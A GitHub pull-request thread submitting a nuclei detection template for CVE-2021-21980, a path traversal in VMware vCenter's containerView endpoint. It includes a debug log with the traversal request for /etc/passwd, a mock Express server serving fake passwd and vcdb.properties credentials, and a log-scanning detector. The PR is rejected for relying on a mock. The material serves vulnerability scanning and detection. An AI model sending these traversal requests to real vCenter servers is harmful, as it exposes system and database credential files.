@Omar8345 Omar8345 commented Dec 5, 2025

/claim #14077

This PR adds a template for CVE‑2021‑21980, a path traversal vulnerability in VMware vCenter Server’s legacy FLEX/Flash-based vSphere Web Client (containerView endpoint).
The issue allows unauthenticated remote attackers to read arbitrary files via traversal in the id parameter.

The template covers both /ui/vic-rest/ and /vsphere-client/vic-rest/ paths and verifies the response using:

  • 200 status code
  • passwd regex (root:...:0:0:)
  • database credential patterns from vcdb.properties

A mock VMware vCenter server was used to validate the template.


Debug Log (Verification)

[WRN] Loading 1 unsigned templates for scan. Use with caution.
[CVE-2021-21980:status-1] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[CVE-2021-21980:regex-2] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd

[INF] Dumped HTTP request:
GET /ui/vic-rest/services/containerView?id=../../../../../../etc/passwd HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0
Accept: */*

[DBG] Dumped HTTP response:
HTTP/1.1 200 OK
Content-Type: text/plain
Server: VMware vCenter Mock

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash

[INF] Scan completed. 2 matches found.

debug.log:

[WRN] Loading 1 unsigned templates for scan. Use with caution.
[CVE-2021-21980:status-1] [http] [high] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[CVE-2021-21980:regex-2] [http] [high] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd

mock server script:

const express = require("express");
const app = express();

const PORT = 8080;

const mockFiles = {
  "/etc/passwd": `
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash
`.trim(),

  "/windows/win.ini": `
[fonts]
; dummy windows file
`.trim(),

  "/etc/vmware-vpx/vcdb.properties": `
jdbc.username=VCENTER_USER
jdbc.password=SuperSecretPass123
jdbc.url=jdbc:postgresql://localhost:5432/VCDB
`.trim(),
};

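// Collapse every run of "../" segments into a single "/" so that
// "../../etc/passwd" maps to the mockFiles key "/etc/passwd".
// Returns null when id is not a string (e.g. a repeated query parameter).
function resolveTraversal(id) {
  try {
    const cleaned = id.replace(/(\.\.\/)+/g, "/");
    return cleaned.startsWith("/") ? cleaned : "/" + cleaned;
  } catch {
    return null;
  }
}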

app.get("/ui/vic-rest/services/containerView", (req, res) => {
  const id = req.query.id || "";

  res.set("Content-Type", "text/plain; charset=utf-8");
  res.set("Server", "VMware vCenter Mock");

  if (!id.includes("..")) {
    return res.status(400).send("Invalid containerView id");
  }

  const target = resolveTraversal(id);

  if (!target || typeof target !== "string") {
    return res.status(500).send("Internal Server Error");
  }

  if (mockFiles[target]) {
    console.log(`[+] Served mock file: ${target}`);
    return res.status(200).send(mockFiles[target]);
  }

  console.log(`[-] File not found: ${target}`);
  return res.status(404).send("Not Found");
});

app.get("/", (req, res) => {
  res.send("Mock vCenter server running (CVE‑2021‑21980)");
});

app.listen(PORT, () =>
  console.log(
    `[Mock CVE‑2021‑21980] Server running on http://localhost:${PORT}`
  )
);
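
A log-side check for the request pattern this template sends, as an added example that is not part of the PR or the nuclei-templates project: it flags access-log lines that hit either containerView path with a traversal sequence in id. The combined log format, the sample lines and the function names are assumptions; it also decodes percent-encoded and double-encoded forms, which goes beyond the literal payload in the debug log.

```javascript
// Added example: flag access-log lines that request the containerView
// endpoint with a traversal sequence in the id parameter.
const ENDPOINT = /^\/(ui|vsphere-client)\/vic-rest\/services\/containerView$/;

// Percent-decode repeatedly (bounded) so %2e%2e%2f and %252e%252e%252f
// both reduce to "../" before inspection.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns { path, id } for a suspicious request target, otherwise null.
function inspectTarget(target) {
  let url;
  try { url = new URL(target, "http://log.invalid"); } catch { return null; }
  if (!ENDPOINT.test(url.pathname)) return null;
  for (const raw of url.searchParams.getAll("id")) {
    const id = fullyDecode(raw).replace(/\\/g, "/");
    if (id.split("/").includes("..")) return { path: url.pathname, id };
  }
  return null;
}

// Scan combined-log-format lines; returns one finding per flagged line.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/.exec(line);
    if (!m) continue;
    const hit = inspectTarget(m[2]);
    if (hit) findings.push({ client: m[1], status: Number(m[3]), ...hit });
  }
  return findings;
}

// Constructed sample lines (not taken from the PR or from a real server).
const SAMPLE_LOG = [
  '192.0.2.10 - - [05/Dec/2025:14:00:01 +0000] "GET /ui/vic-rest/services/containerView?id=../../../../../../etc/passwd HTTP/1.1" 200 142',
  '192.0.2.10 - - [05/Dec/2025:14:00:02 +0000] "GET /vsphere-client/vic-rest/services/containerView?id=%252e%252e%252f%252e%252e%252fetc%252fvmware-vpx%252fvcdb.properties HTTP/1.1" 404 9',
  '198.51.100.7 - - [05/Dec/2025:14:00:03 +0000] "GET /ui/vic-rest/services/containerView?id=container-42 HTTP/1.1" 200 512',
  '198.51.100.7 - - [05/Dec/2025:14:00:04 +0000] "GET /ui/login?id=../x HTTP/1.1" 302 0',
];
console.log(scanAccessLog(SAMPLE_LOG));
```

A flagged line with status 200 deserves closer review than a 404, since it suggests the server returned content for the traversed path.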

Author

Omar8345 commented Dec 5, 2025

Hi @pussycat0x 👋,

I’d like to work on this bounty, but I don’t have hardware to run ESXi/VCSA for proper testing.

Are there any acceptable alternatives for validation—e.g., emulated/partial VCSA, cloud HOL, or enhanced mock server evidence?

I want to make it fully review‑compliant and would appreciate your guidance. 🙏

@Omar8345 Omar8345 marked this pull request as ready for review December 5, 2025 14:03
@DhiyaneshGeek
Member

Hi @Omar8345

Thanks for participating in the Bounty Claim Program.

After reviewing the PR, it was observed that it was validated against a mock setup, which is out of scope and isn't eligible for the Bounty Claim.

Due to the following reason, we are closing this PR.

Thanks
